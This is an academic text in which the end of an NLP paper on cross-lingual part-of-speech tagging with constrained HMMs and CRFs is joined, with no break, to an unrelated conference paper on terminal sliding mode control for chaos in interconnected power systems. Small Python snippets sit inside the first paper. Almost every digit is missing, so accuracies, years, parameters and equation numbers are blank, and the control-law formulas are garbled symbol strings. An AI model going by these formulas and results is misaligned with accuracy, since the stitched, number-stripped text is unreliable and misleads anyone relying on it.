if there are no projections and no tag dictionary, then ŷ(x,ỹ) = t |x|, and thus pβ(x,ŷ(x,ỹ)) = pβ(x), which reduces to fully unsupervised learning. the ` -regularized marginal joint log-likelihood of the constrained training data d = {(x(i), ỹ(i))}ni= is: l(β;d) = n∑ i= log pβ(x (i),ŷ(x(i), ỹ(i)))−γ‖β‖ . ( ) we follow berg-kirkpatrick et al. ( ) and take a direct gradient approach for optimizing eq. with l-bfgs (liu and nocedal, ). we set γ = and run iterations of l-bfgs. one could also em- ploy the expectation-maximization (em) algorithm (dempster et al., ) to optimize this objective, al- though the relative merits of em versus direct gradi- ent training for these models is still a topic of debate (berg-kirkpatrick et al., ; li et al., ). note that since the marginal likelihood is non-concave, we are only guaranteed to find a local maximum of eq. . after estimating the model parameters β, the tag- sequence y∗ ∈ y(x) for a sentence x ∈ x is pre- dicted by choosing the one with maximal joint prob- ability: y∗ ← arg max y∈y(x) pβ(x,y) . we trained the hmm with em as well, but achieved better results with direct gradient training and hence omit those results. . crfs with coupled constraints whereas an hmm models the joint probability of the input x ∈x and output y ∈y(x), using locally normalized component distributions, a conditional random field (crf) instead models the probability of the output conditioned on the input as a globally nor- malized log-linear distribution (lafferty et al., ): pθ(y | x) = exp ( θ>Φ(x,y) ) ∑ y′∈y(x) exp (θ >Φ(x,y′)) , where θ is a parameter vector. as for the hmm, y(x) is not necessarily the full space of possible tag-sequences; specifically, for us, it is the dictionary- pruned lattice without the token constraints. with a first-order markov assumption, the feature function factors as: Φ(x,y) = |x|∑ i= φ(x,yi,yi− ) . this model is more powerful than the hmm in that it can use richer feature definitions, such as joint in- put/transition features and features over a wider input context. we model a marginal conditional probabil- ity, given by the total probability of all tag sequences consistent with the lattice ŷ(x,ỹ): pθ(ŷ(x,ỹ) | x) = ∑ y∈ŷ(x,ỹ) pθ(y | x) . the parameters of this constrained crf are estimated by maximizing the ` -regularized marginal condi- tional log-likelihood of the constrained data (riezler et al., ): l(θ;d) = n∑ i= log pθ(ŷ(x(i), ỹ(i)) | x(i)) −γ‖θ‖ . ( ) as with eq. , we maximize eq. with itera- tions of l-bfgs and set γ = . in contrast to the hmm, after estimating the model parameters θ, the tag-sequence y∗ ∈ y(x) for a sentence x ∈ x is chosen as the sequence with the maximal conditional probability: y∗ ← arg max y∈y(x) pθ(y | x) . empirical study we now present a detailed empirical study of the mod- els proposed in the previous sections. in addition to comparing with the state of the art in das and petrov ( ) and li et al. ( ), we present models with several combinations of token and type constraints, additional features incorporating word clusters. both generative and discriminative models are explored. . experimental setup before delving into the experimental details, we present our setup and datasets. languages. we evaluate on eight target languages used in previous work (das and petrov, ; li et al., ) and on seven additional languages (see ta- ble ). 
while the former eight languages all belong to the indo-european family, we broaden the coverage to language families more distant from the source language (for example, chinese, japanese and turk- ish). we use the treebanks from the conll shared tasks on dependency parsing (buchholz and marsi, ; nivre et al., ) for evaluation. the two- letter abbreviations from the iso - standard are used when referring to these languages in tables and figures. tagset. in all cases, we map the language-specific pos tags to universal pos tags using the mapping of petrov et al. ( ). since we use indirect super- vision via projected tags or wiktionary, the model states induced by all models correspond directly to pos tags, enabling us to compute tagging accuracy without a greedy -to- or many-to- mapping. bitext. for all experiments, we use english as the source language. depending on availability, there are between m and m parallel sentences for each language. the majority of the parallel data is gath- ered automatically from the web using the method of uszkoreit et al. ( ). we further include data from europarl (koehn, ) and from the un par- allel corpus (un, ), for languages covered by these corpora. the english side of the bitext is pos tagged with a standard supervised crf tagger, trained on the penn treebank (marcus et al., ), with tags mapped to universal tags. the parallel sen- for french we use the treebank of abeillé et al. ( ). we use version . of the mappings available at http: //code.google.com/p/universal-pos-tags/. tences are word aligned with the aligner of denero and macherey ( ). intersected high-confidence alignments (confidence > . ) are extracted and ag- gregated into projected type-level dictionaries. for purely practical reasons, the training data with token- level projections is created by randomly sampling target-side sentences with a total of k tokens. wiktionary. we use a snapshot of the wiktionary word definitions, and follow the heuristics of li et al. ( ) for creating the wiktionary dictionary by mapping the wiktionary tags to universal pos tags. features. for all models, we use only an identity feature for tag-pair transitions. we use five features that couple the current tag and the observed word (analogous to the emission in an hmm): word iden- tity, suffixes of up to length , and three indicator features that fire when the word starts with a capital letter, contains a hyphen or contains a digit. these are the same features as those used by das and petrov ( ). finally, for some models we add a word cluster feature that couples the current tag and the word cluster identity of the word. these (monolin- gual) word clusters are induced with the exchange algorithm (uszkoreit and brants, ). we set the number of clusters to across all languages, as this has previously been shown to produce robust results for similar tasks (turian et al., ; täckström et al., ). the clusters for each language are learned on a large monolingual newswire corpus. . models with type constraints to examine the sole effect of type constraints, we experiment with the hmm, drawing constraints from three different dictionaries. table compares the per- formance of our models with the best results of das and petrov ( , d&p) and li et al. ( , lg&t). as in previous work, training is done exclusively on the training portion of each treebank, stripped of any manual linguistic annotation. 
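The emission feature templates just described (word identity, short suffixes, and capitalization, hyphen, and digit indicators, optionally a word-cluster identity) are easy to express as a feature function. In the sketch below the maximum suffix length of 3 and the cluster lookup are assumptions chosen for illustration, not values taken from the text.

```python
# Sketch of tag-word feature templates in the spirit of the description above.
# The suffix length bound and the cluster mapping are illustrative assumptions.

def emission_features(word, tag, clusters=None, max_suffix=3):
    lower = word.lower()
    feats = [f"word={lower}|tag={tag}"]
    for k in range(1, max_suffix + 1):
        if len(lower) > k:
            feats.append(f"suffix{k}={lower[-k:]}|tag={tag}")
    if word[:1].isupper():
        feats.append(f"capitalized|tag={tag}")
    if "-" in word:
        feats.append(f"has_hyphen|tag={tag}")
    if any(ch.isdigit() for ch in word):
        feats.append(f"has_digit|tag={tag}")
    if clusters and lower in clusters:
        feats.append(f"cluster={clusters[lower]}|tag={tag}")
    return feats

print(emission_features("Jordbruksprodukterna", "NOUN",
                        clusters={"jordbruksprodukterna": 211}))
```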
we first use all of our parallel data to generate projected tag dictionaries: the english pos tags are projected across word alignments and aggregated to tag distributions for each word type. as in das and petrov ( ), the distributions are then filtered with a threshold of . to remove noisy tags and to create an unweighted tag dictionary. (the definitions were downloaded on august , from http://toolserver.org/˜enwikt/definitions/; this snapshot is more recent than that used by li et al.) table : tagging accuracies for type-constrained hmm models. d&p is the "with lp" model in table of das and petrov ( ), while lg&t is the "shmm-me" model in table of li et al. ( ). yhmmproj., yhmmwik. and yhmmunion are hmms trained solely with type constraints derived from the projected dictionary, wiktionary and the union of these dictionaries, respectively. yhmmunion +c is equivalent to yhmmunion with additional cluster features. all models are trained on the treebank of each language, stripped of gold labels. results are averaged over the languages from das and petrov ( ), denoted avg ( ), as well as over the full set of languages, denoted avg. we call this model yhmmproj.; its average accuracy of . % on the eight languages is higher than the . % of d&p and on par with lg&t ( . %). our next model (yhmmwik.) simply draws type constraints from wiktionary. it slightly underperforms lg&t ( . %), presumably because they used a second-order hmm. as a simple extension to these two models, we take the union of the projected dictionary and wiktionary to constrain an hmm, which we name yhmmunion. this model performs a little worse on the eight indo-european languages ( . ), but gives an improvement over the projected dictionary when evaluated across all languages ( . % vs. . %). our model corresponds to the weaker, "no lp" projection of das and petrov ( ). we found that label propagation was only beneficial when small amounts of bitext were available. table : tagging accuracies for models with token constraints and coupled token and type constraints. all models use cluster features (. . . +c) and are trained on large training sets each containing k tokens with (partial) token-level projections (. . . +l). the best type-constrained model, trained on the larger datasets, yhmmunion +c+l, is included for comparison. the remaining columns correspond to hmm and crf models trained only with token constraints (ỹ . . .) and with coupled token and type constraints (ŷ . . .). the latter are trained using the projected dictionary (·proj.), wiktionary (·wik.)
and the union of these dictionaries (·union), respectively. the search spaces of the models trained with coupled constraints (ŷ . . .) are each pruned with the respective tag dictionary used to derive the coupled constraints. the observed difference between ŷcrfwik. +c+l and yhmmunion +c+l is statistically significant at p < . (**) and p < . (*) according to a paired bootstrap test (efron and tibshirani, ). significance was not assessed for avg or avg ( ). we next add monolingual cluster features to the model with the union dictionary. this model, yhmmunion +c, significantly outperforms all other type- constrained models, demonstrating the utility of word-cluster features. for further exploration, we train the same model on the datasets containing k tokens sampled from the target side of the parallel data (yhmmunion +c+l); this is done to explore the effects of large data during training. we find that training on these datasets result in an average accuracy of . % which is comparable to the . % reported for yhmmunion +c in table . this shows that the different source domain and amount of training data does not influence the performance of the hmm significantly. finally, we train crf models where we treat type constraints as a partially observed lattice and use the full unpruned lattice for computing the partition func- these are monolingual clusters. bilingual clusters as intro- duced in täckström et al. ( ) might bring additional benefits. tion (§ . ). due to space considerations, the results of these experiments are not shown in table . we ob- serve similar trends in these results, but on average, accuracies are much lower compared to the type- constrained hmm models; the crf model with the union dictionary along with cluster features achieves an average accuracy of . % when trained on same data. this result is not unsurprising. first, the crf’s search space is fully unconstrained. second, the dic- tionary only provides a weak set of observation con- straints, which do not provide sufficient information to successfully train a discriminative model. how- ever, as we will observe next, coupling the dictionary constraints with token-level information solves this problem. . models with token and type constraints we now proceed to add token-level information, focusing in particular on coupled token and type constraints. since it is not possible to generate projected token constraints for our monolingual treebanks, we train all models in this subsection on the k-tokens datasets sampled from the bi- text. as a baseline, we first train hmm and crf models that use only projected token constraints (ỹhmm+c+l and ỹcrf+c+l). as shown in table , these models underperform the best type-level model (yhmmunion +c+l), which confirms that projected to- ken constraints are not reliable on their own. this is in line with similar projection models previously examined by das and petrov ( ). we then study models with coupled token and type constraints. these models use the same three dictio- naries as used in § . , but additionally couple the derived type constraints with projected token con- straints; see the caption of table for a list of these models. note that since we only allow projected tags that are licensed by the dictionary (step of the trans- fer, § . ), the actual token constraints used in these models vary with the different dictionaries. from table , we see that coupled constraints are superior to token constraints, when used both with the hmm and the crf. 
however, for the hmm, coupled constraints do not provide any benefit over type constraints alone, in particular when the projected dictionary or the union dictionary is used to derive the coupled constraints (ŷhmmproj. +c+l and ŷhmmunion +c+l). we hypothesize that this is because these dictionaries (in particular the former) have the same bias as the token-level tag projections, so that the dictionary is unable to correct the systematic errors in the projections (see § . ). since the token constraints are stronger than the type constraints in the coupled models, this bias may have a substantial impact. with the wiktionary dictionary, the difference between the type-constrained and the coupled-constrained hmm is negligible: yhmmunion +c+l and ŷhmmwik. +c+l both average at an accuracy of . %. (to make the comparison fair vis-a-vis potential divergences in training domains, we compare to the best type-constrained model trained on the same k tokens training sets.) the crf model, on the other hand, is able to take advantage of the complementary information in the coupled constraints, provided that the dictionary is able to filter out the systematic token-level errors. with a dictionary derived from wiktionary and projected token-level constraints, ŷcrfwik. +c+l performs better than all the remaining models, with an average accuracy of . % across the eight indo-european languages available to d&p and lg&t. averaged over all languages, its accuracy is . %. [figure : relative influence of token and type constraints on tagging accuracy in the ŷcrfwik. +c+l model. word types are categorized according to a) their number of wiktionary tags ( , , or + tags, with representing no wiktionary entry; top-axis) and b) the number of times they are token-constrained in the training set (divided into buckets of , - , - and + occurrences; x-axis). the boxes summarize the accuracy distributions across languages for each word type category as defined by a) and b). the horizontal line in each box marks the median accuracy, the top and bottom mark the first and third quantile, respectively, while the whiskers mark the minimum and maximum values of the accuracy distribution.] further analysis in this section we provide a detailed analysis of the impact of token versus type constraints and we study the pruning and filtering mistakes resulting from incomplete wiktionary entries in detail. this analysis is based on the training portion of each treebank. . influence of token and type constraints the empirical success of the model trained with coupled token and type constraints confirms that these constraints indeed provide complementary signals. figure provides a more detailed view of the relative benefits of each type of constraint. we observe several interesting trends. first, word types that occur with more token constraints during training are generally tagged more accurately, regardless of whether these types occur in wiktionary. [figure : average pruning accuracy (line) across languages (dots) as a function of the number of hypothetically corrected wiktionary entries for the k most frequent word types. for example, position on the x-axis corresponds to manually correcting the entries for the most frequent types, while position corresponds to experimental conditions.]
the most common scenario is for a word type to have exactly one tag in wiktionary and to occur with this projected tag over times in the training set (facet , rightmost box). these common word types are typically tagged very accurately across all languages. second, the word types that are ambiguous according to wiktionary (facets and ) are predominantly frequent ones. the accuracy is typically lower for these words compared to the unambiguous words. however, as the number of projected token constraints is increased from zero to + observations, the ambiguous words are effectively disambiguated by the token constraints. this shows the advantage of intersecting token and type constraints. finally, projection generally helps for words that are not in wiktionary, although the accuracy for these words never reaches the accuracy of the words with only one tag in wiktionary. interestingly, words that occur with a projected tag constraint less than times are tagged more accurately for types not in the dictionary compared to ambiguous word types with the same number of projected constraints. a possible explanation for this is that the ambiguous words are inherently more difficult to predict and that most of the words that are not in wiktionary are less common words that tend to also be less ambiguous. [figure : prevalence of pruning mistakes per pos tag, when pruning the inference search space with wiktionary.] . wiktionary pruning mistakes the error analysis by li et al. ( ) showed that the tags licensed by wiktionary are often valid. when using wiktionary to prune the search space of our constrained models and to filter token-level projections, it is also important that correct tags are not mistakenly pruned because they are missing from wiktionary. while the accuracy of filtering is more difficult to study, due to the lack of a gold standard tagging of the bitext, figure (position on the x-axis) shows that search space pruning errors are not a major issue for most languages; on average the pruning accuracy is almost %. however, for some languages such as chinese and czech the correct tag is pruned from the search space for nearly % of all tokens. when using wiktionary as a pruner, the upper bound on accuracy for these languages is therefore only around %. however, figure also shows that with some manual effort we might be able to remedy many of these errors. for example, by adding missing valid tags to the most common word types in the worst language, the minimum pruning accuracy would rise above % from below %. if the same was to be done for all of the studied languages, the mean pruning accuracy would reach over %. figure breaks down pruning errors resulting from incorrect or incomplete wiktionary entries across the correct pos tags. from this we observe that, for many languages, the pruning errors are highly skewed towards specific tags. for example, for czech over % of the pruning errors are caused by mistakenly pruned pronouns. conclusions we considered the problem of constructing multilingual pos taggers for resource-poor languages. to this end, we explored a number of different models that combine token constraints with type constraints from different sources. the best results were obtained with a partially observed crf model that effectively integrates these complementary constraints.
in an extensive empirical study, we showed that this approach substantially improves on the state of the art in this context. our best model significantly out- performed the second-best model on out of evaluated languages, when trained on identical data sets, with an insignificant difference on languages. compared to the prior state of the art (li et al., ), we observed a relative reduction in error by %, averaged over the eight languages common to our studies. acknowledgments we thank alexander rush for help with the hyper- graph framework that was used to implement our models and klaus macherey for help with the bi- text extraction. this work benefited from many dis- cussions with yoav goldberg, keith hall, kuzman ganchev and hao zhang. we also thank the editor and the three anonymous reviewers for their valuable feedback. the first author is grateful for the financial support from the swedish national graduate school of language technology (gslt). references anne abeillé, lionel clément, and françois toussenel. . building a treebank for french. in a. abeillé, editor, treebanks: building and using parsed corpora, chapter . kluwer. taylor berg-kirkpatrick, alexandre bouchard-côté, john denero, and dan klein. . painless unsupervised learning with features. in proceedings of naacl-hlt. sabine buchholz and erwin marsi. . conll-x shared task on multilingual dependency parsing. in proceedings of conll. stanley f chen. . conditional and joint models for grapheme-to-phoneme conversion. in proceedings of eurospeech. christos christodoulopoulos, sharon goldwater, and mark steedman. . two decades of unsupervised pos induction: how far have we come? in proceed- ings of emnlp. dipanjan das and slav petrov. . unsupervised part- of-speech tagging with bilingual graph-based projec- tions. in proceedings of acl-hlt. arthur p. dempster, nan m. laird, and donald b. rubin. . maximum likelihood from incomplete data via the em algorithm. journal of the royal statistical society, series b, . john denero and klaus macherey. . model-based aligner combination using dual decomposition. in pro- ceedings of acl-hlt. brad efron and robert j. tibshirani. . an introduc- tion to the bootstrap. chapman & hall, new york, ny, usa. victoria fossum and steven abney. . automatically inducing a part-of-speech tagger by projecting from multiple source languages across aligned corpora. in proceedings of ijcnlp. dan garrette and jason baldridge. . type-supervised hidden markov models for part-of-speech tagging with incomplete tag dictionaries. in proceedings of emnlp- conll. yoav goldberg, meni adler, and michael elhadad. . em can find pretty good hmm pos-taggers (when given a good start). in proceedings of acl-hlt. philipp koehn. . europarl: a parallel corpus for statistical machine translation. in mt summit. john d. lafferty, andrew mccallum, and fernando c. n. pereira. . conditional random fields: probabilistic models for segmenting and labeling sequence data. in proceedings of icml. shen li, joão graça, and ben taskar. . wiki-ly supervised part-of-speech tagging. in proceedings of emnlp-conll. dong c. liu and jorge nocedal. . on the limited memory bfgs method for large scale optimization. mathematical programming, . mitchell p. marcus, mary ann marcinkiewicz, and beat- rice santorini. . building a large annotated corpus of english: the penn treebank. computational linguis- tics, ( ). tahira naseem, benjamin snyder, jacob eisenstein, and regina barzilay. . multilingual part-of-speech tagging: two unsupervised approaches. 
jair, . joakim nivre, johan hall, sandra kübler, ryan mcdon- ald, jens nilsson, sebastian riedel, and deniz yuret. . the conll shared task on dependency parsing. in proceedings of emnlp-conll. slav petrov, dipanjan das, and ryan mcdonald. . a universal part-of-speech tagset. in proceedings of lrec. sujith ravi and kevin knight. . minimized models for unsupervised part-of-speech tagging. in proceed- ings of acl-ijcnlp. stefan riezler, tracy h. king, ronald m. kaplan, richard crouch, john t. maxwell, iii, and mark johnson. . parsing the wall street journal using a lexical-functional grammar and discriminative estimation techniques. in proceedings of acl. noah smith and jason eisner. . contrastive estima- tion: training log-linear models on unlabeled data. in proceedings of acl. oscar täckström, ryan mcdonald, and jakob uszkoreit. . cross-lingual word clusters for direct transfer of linguistic structure. in proceedings of naacl-hlt. joseph turian, lev-arie ratinov, and yoshua bengio. . word representations: a simple and general method for semi-supervised learning. in proceedings of acl. un. . ods un parallel corpus. jakob uszkoreit and thorsten brants. . distributed word clustering for large scale class-based language modeling in machine translation. in proceedings of acl-hlt. jakob uszkoreit, jay ponte, ashok popat, and moshe dubiner. . large scale parallel document mining for machine translation. in proceedings of coling. chenhai xi and rebecca hwa. . a backoff model for bootstrapping resources for non-english languages. in proceedings of hlt-emnlp. david yarowsky and grace ngai. . inducing mul- tilingual pos taggers and np bracketers via robust projection across aligned corpora. in proceedings of naacl. international conference on sensor network and computer engineering (icsnce ) a new non-singular terminal sliding mode control and its application to chaos suppression in interconnected power system wang nian, chen hui, ding dawei school of electronics and information engineering, anhui university hefei, , china e-mail: wn_xlb@ahu.edu.cn power quality engineering research center, min of education hefei, , china e-mail: @qq.com abstract—interconnected power system is a typical nonlinear dynamical system, it will cause great harm to the interconnected power system when the chaos occurred. this paper analyses the nonlinear dynamical behavior of the interconnected power system with a uncertain electromagnetic disturbance amplitude, and the influence of the electromagnetic disturbance amplitude on the stability of the system is obtained. thus, this paper proposes a novel non-singular terminal sliding mode control to restrain the chaos, then the system will reach a stable state in a fixed time. according to the theoretical analysis, by introducing the saturation function, the control method can solve the singularity problem in the sliding mode control, and the interconnected power system will be stable in a short time when it’s in chaos. the simulation prove the correctness of the method. keywords-interconnected power system; saturation function; non-singularity; sliding mode control; fixed time i. introduction power system is a kind of nonlinear dynamical system with multi-degree of freedom, strong coupling and multi-variable, which has rich dynamical behaviors. with the development of power grid system, grid interconnection has became a inevitable trend, and it can improve the quality of power. at the same time, it also provides convenience for the dispatching optimization of power system[ - ]. 
however, chaos often appears in the interconnected power system, it will bring great challenge to the stability of power system. for example, as the result of chaotic oscillations[ - ], several large area power outages appear in the united states, china and canada in . and it is difficult to suppress this phenomenon by using linear controller[ ]. therefore, it is necessary to study the mechanism of chaos in interconnected power systems and it is meaningful to design the nonlinear controller to suppress the chaos. due to the high nonlinear characteristics of the interconnected power system, its stability is very sensitive to outside disturbance. if the perturbation is too large, its operating point will change obviously. there are also some tools to analyze its stability which include geometric method, energy function, bifurcation theory and numerical simulation[ ]. recently, there are a lot of scholars to study the stability of power grid system. for example, nayfeh [ ] uses the multi-scale perturbation method to study the stability of single machine power system and the bifurcation analysis of a single machine infinite power system is investigated by duan[ ]. because coupling power angle exists in the interconnected power system, the inherent dynamical behavior of interconnected power system will be more abundant. through the detailed numerical simulation, the influence of the conventional non-linearity index on the dynamic characteristics of the interconnected power system is expounded[ ]. international conference on sensor network and computer engineering (icsnce ) in recent years, with the development of control method, the system is controlled from the single machine infinite system to multiple machine system, and the interconnected power system. in this paper, by proposing a fix-time non-singular terminal sliding mode control to realize stability when chaos occurred in interconnection power system. some systems can be stabilized in a fixed time by using finite time control, this control method can be used in a lot of fields (for instance[ - ]). however, it is difficult to ensure the boundary convergence time when it is independent of the initial state. therefore, in some practical system, it is not workable to use this control method when the initial condition is uncertain. fortunately, this question was solved by polyakov with the fixed-time stability theory[ ]. zuo[ ] proposed a non-singular fixed-time terminal sliding mode controller for a class of second order nonlinear systems that can solve the singularity problem of terminal sliding mode controller in most instances. in this paper, by using the fast terminal sliding mode control can make the system convergence to steady state in finite time, the saturation function[ ] and fast fixed time stability theory that can solve the singular problem through theoretical proof in this control method. this control method not only solve the singularity problem of the sliding mode controller, but the convergence speed is faster. motivated by the above analysis, this paper investigated the dynamical characteristics and control of interconnected power system. section introduces the dynamical characteristics of the interconnected power system, by introducing the maximum lyapunov index, power spectrum, phase diagram and timing diagram, the paper decribe the dynamic of the interconnected power system. when the amplitude of electromagnetic disturbance is v= . ,the system is in chaos. 
a non-sigular sliding mode variable structure control method has been introduced in section and the effectiveness of the control method can be obtained by theoretical analysis, the advantages of this method are verified, and the convergence time is calculated in section .and section gives the conclusion of this paper. ii. the analysis of the model and dynamic characteristics of the interconnected power system there are two kinds of oscillation modes in interconnection power system, one is a single generator acts on other generators in the system with the frequency is between . and . hz. the other oscillation mode is mainly expressed as a generator group in a region interacts with a generator group in another area, the frequency is between . - . hz. this paper studies the interconnected power system model with two generators. considering the influence of the amplitude of the electromagnetic disturbance power, the model is as follows: ( ) ( ), ( ) [ sin( ( )) ( ) cos( ) sin( ( )) cos( )] s m k e d t t dt d t p t d t p p t t p t dt h                 where, ( )t is the phase angle between the excitation potential and the terminal voltage between the two generators, and ( )t is the angular velocity of the two generators. d is the equivalent damping coefficient. , , , s m e k p p p p represents the amplitude of the electromagnetic power, the mechanical power, the load disturbance power, and the electromagnetic disturbance power, respectively. ,  is the electromagnetic power disturbance frequency and the load disturbance frequency. h is the equivalent moment of inertia. in order to analyses the dynamics of the interconnected power system, the simplified model is obtained: ( ) ( ), ( ) sin( ( )) ( ) cos( ) sin( ( )) cos( ) dx x d dx x x v x d                     ( ) where ( ) ( ), ( ) ( ) / , / , / , / , / , / , / , / s s m s k s e s s s s x t x t h p d hp p p v p p p p h p h p t p h                      here, the parameters can be selected as . , . , . , .            . a. lyapunov exponent the lyapunov exponent is an important parameter of the system that can be used to measure and determine whether international conference on sensor network and computer engineering (icsnce ) the dynamic system is in the chaos. when the maximum lyapunov exponent of the dynamic system is greater than , it can be concluded that the system is in chaotic oscillation state. figure . the lyapunov exponent b. power spectrum to study the chaotic behavior of a system, it is effective to use power spectrum analysis methods. actually, power spectrum analysis is through the time and space translate to the frequency space for the signal frequency structure. when the chaos occurs in the system, the power spectrum of the system behaves as a continuous irregular distribution, for example in fig. (c). (a) (b) (c) figure . power spectrum similarly, the phase space map also is a tool to determine whether the system is in chaos. (a) (b) (c) figure . phase plane plots international conference on sensor network and computer engineering (icsnce ) according to the maximum lyapunov exponent, phase diagram, and power spectrum of interconnected power system, we can know that the interconnected power system is in an irregular non-periodic chaotic state when the parameter . v  .this chaotic state will cause great harm to the stability of the system, it will lead to a large area of power outages. 
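The power-spectrum criterion used above (a broadband, continuous spectrum for chaotic motion versus isolated peaks for periodic motion) is easy to check numerically. The sketch below integrates a generic damped, periodically forced swing-type oscillator and inspects its spectrum; the right-hand side and every coefficient are placeholder assumptions for demonstration, not the interconnected power system model or the parameter values used in this paper.

```python
import numpy as np
from scipy.integrate import solve_ivp

# Illustrative power-spectrum test for chaos on a generic forced, damped
# pendulum-like oscillator. Model form and coefficients are assumptions for
# demonstration only; they are not the paper's system or parameters.

def rhs(t, y, damping=0.5, forcing=1.2, freq=2.0 / 3.0):
    x1, x2 = y
    return [x2, -np.sin(x1) - damping * x2 + forcing * np.cos(freq * t)]

dt, t_end = 0.05, 2000.0
t_eval = np.arange(0.0, t_end, dt)
sol = solve_ivp(rhs, (0.0, t_end), [0.1, 0.1], t_eval=t_eval, rtol=1e-8)

x = sol.y[1][len(t_eval) // 2:]            # discard the transient
x = x - x.mean()
power = np.abs(np.fft.rfft(x)) ** 2        # one-sided power spectrum
freqs = np.fft.rfftfreq(x.size, d=dt)

# A chaotic response spreads power over a continuous band of frequencies,
# whereas a periodic response concentrates it at the forcing frequency and
# its harmonics.
dominant = freqs[np.argsort(power)[-5:]]
print("dominant frequencies:", np.round(dominant, 3))
```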
therefore, it is necessary to study the method to restrain the chaos in interconnected power system. iii. the sliding mode controller design in this section, the paper proposes a control scheme that can restrain chaos in power system, this paper needs to add control law in the second item in control equation that can make the system output x convergences to the control target, namely, , ( ) ( , ) ( ) , x x x f x g x t d t u         ( ) where : ( ) sinf x x x     : ( , ) cos( ) sing x t v t x  , ( ) cos( )d t t  . by proposing a timing non-singular fast terminal control method, the system can be smoothly stabilized on the sliding surface s . the sliding surface s is designed as: ( ) (| | ) m m p sign x n n q s x x x         ( ) the paper can get the reach law : ( ) (| | ) m m p sign s n n q s s s          here, after reading the relevant literature [ ] about how to overcome the singularity in terminal sliding mode control. this paper quotes saturation function that can solve the question. ( ) (| |) ( ) (| | ) [ ( ) ( ( ) (| | )) ] ( , ) m m sign x n n p q m m p sign s n n q m u f x dt n m sign x x x n p sat x x h q s s                         ( ) in control input, the paper quotes saturation function to limit the amplitude of singularity term p q x x  ,where the saturation function is , | | , ( , ) ( ), | | , x if x y sat x y y sign x if x y      ( ) theorem in control law( ), if there is a positive number , , ,    ,and also m , n , m , n , p , q , p , q is odd positive integers satisfying m n , m n , p q , p q , and ( ) / m n , ( ) / m n , ( ) / p q , ( )p q is odd positive integers. the system will be stable in a fixed time. proof v s  ( )  ( ) (| | ) ( ) (| | ) ( ) (| | ) ( ) ( ) ( ) m m p sign s n n q m m p sign s n n q m m p sign s n n q v s s s s s s s v v                                     when | | s  ( ) ( ) m p n q v v v       ( ) international conference on sensor network and computer engineering (icsnce ) when | | s  ( ) ( ) p q v v v      ( ) obviously, v  , so the control system will stable in expect target non-singularity. theorem the singularity item of the control input is restricted by the saturation function method, so that the system does not affect the stability analysis even if there is a singular region. proof defined inequality | | p qp x x h q    as the singularity area. the state variable x in first equation at system( ). ( ) ( ) ( ) t x t x x d   ( ) when ( ) x t  , ( )x t will increase monotonically and leave the singularity. if ( ) x t  , ( )x t will decrease monotoniclly and leave the singularity. therefore, the existence of the singular region does not affect the results of the stability analysis . arrival time analysis consider the following differential equation ( ) (| | ) pm m sign y qn nx x x         ( ) where, assuming ,    , and , , ,m n p q is odd positive integers, the system will stable in a fix time. 
proof the above system can be written as follows: ,| | ,| | pm qn p q x x x x x x x x                  ( ) a new variable is defined as p q z x   , so, the first equation in the above system can be written m p n q p qq p q p z z q q         ( ) let [( ) ] / [ ( )]m n q n q p    , can get q p q p z z q q         ( ) similarly available, the second equation in system can be obtained q p q p z z q q        ( ) so, the maximum convergence time is lim ( ) lim ( ) ( ln( )) ln( ) z z z q t z dz dz q p z z q n q q p m n q p                                 ( ) without losing the general consideration of second order systems, the fix time for the controlled system to reach the slid surface is ln( ) m p n q n q t m n q p            ( ) when the controlled system reaches the sliding surface s  , the target sliding mode of the system satisfies the following ( ) (| | ) m m p sign x n n q x x x x          ( ) the corresponding system x will converge in a fixed time: ln( ) m p n q n q t m n q p            ( ) the convergence time for system is ln( ) ln( ) m p n q m p n q n q t t t m n q p n q m n q p                         ( ) iv. simulation experiment the proposed control method is applied to suppress chaotic oscillation in studied power system. the parameters international conference on sensor network and computer engineering (icsnce ) of the controller is   ,   ,   ,   , m  , n  , m  , n  , h  , p  , q  , p  , q  . the initial value of the controlled system is [ , ] [ . , . ]x x  .the dynamics of the system under this parameter have been obtained in the second part, and the system is in a chaotic state before it is controlled. as shown in figure , before being controlled, the system is in a chaos. figure . time domain waveform(uncontrolled) figure . time domain waveform after control figure . phase plane plots international conference on sensor network and computer engineering (icsnce ) figure . power spectrum from fig. , this paper can get that the system under chaotic oscillation is controlled by the control method proposed in this paper, then it will converge quickly to the desired target within a fixed time. by contrasting the fig. , fig. , this can find this result. the system will be in chaos when it’s uncontrolled, but the method which have proposed in this paper apply in the interconnected system, the system is stabilized. v. conclusion in this paper, by plotting the lyapunov exponent diagram, power spectrum and phase diagram of the interconnected power system, the influence of the amplitude of the electromagnetic disturbance for the system has been analyzed. according to the three stability criteria, when the system parameter . v  , the interconnected power system will be in chaos. so, a non-singular terminal sliding mode control method with fixed time stability has been applied in the system when it’s in chaos. by comparing the system output, we can find that the control method proposed in this paper can restrain the chaotic oscillation, and the interconnection system is stabilized in a fixed time. the singularity problem in the terminal sliding mode control is eliminated by introducing the saturation function. due to the timing convergence characteristics and non-singularity of the proposed method, it will be applied to the actual power equipment. vi. 
acknowledgment the paper supported by national natural science foundation of china ( ) and major science and technology projects in anhui province ( ). references [ ] fuhong min ,yaoda wang, guangya peng, enrong wang,and jane a.auth, , “bifurcations, chaos and adaptive backstepping sliding mode control of a power system with excitation limitation”.aip advances, , [ ] jyoti ranjan nayak, tridipta kumar pati, binod kumar sahu, sanjeeb kumar kar, , iccpct “fuzzy-pid controller optimized tlbo algorithm on automatic generation control of a two-area interconnected power system” [ ] sat sat aung, zaw min htike asrjets “modeling and simulation of load frequency control for three area power system using proportional integral derivative (pid) controller” - [ ] chen ju-hua,xu nan.application resrarch on small signal stability analysis of power systems”.proceedings of the csee, , ( ): - [ ] du quwei, xiaoshu luo.passivity-based adaptive control of chaotic oscillations in power system”. chaos solitons&fractals . ( ): - [ ] mm zirkohi, tkumbasar, t lin, “hybrid adapive type- fuzzy tracking control of chaoic oscillation damping of power systems” asian journal of control . [ ] j ni, l liu, c liu, x hu.chattering-free time scale separation sliding mode control design with application to power system chaos suppressin.mathematical problems in engineering, : - . [ ] q sun, y zhang, h he, d ma, h zhang.a novel energy function-based stability evaluation and nonlinear control approach for energy internet.ieee transactions on smart grid, , pp( ) - [ ] ali nayfeh dean t. mook donald w.lobitz numerical perturbation method for the nonlinear analysis of structural vibrations - [ ] xiaodong wang, yushu chen, gang han, caiqin song “nonlinear dynamic analysis of a single-machine infinite bus power system applied mathematical modelling “ - international conference on sensor network and computer engineering (icsnce ) [ ] min fu-hong, ma mei-ling zhai wei wang en-rong ” chaotic control of the interconnected power system based on the relay characteristic function” acta phys. sin. [ ] x. y. he, q. y. wang, and w. w. 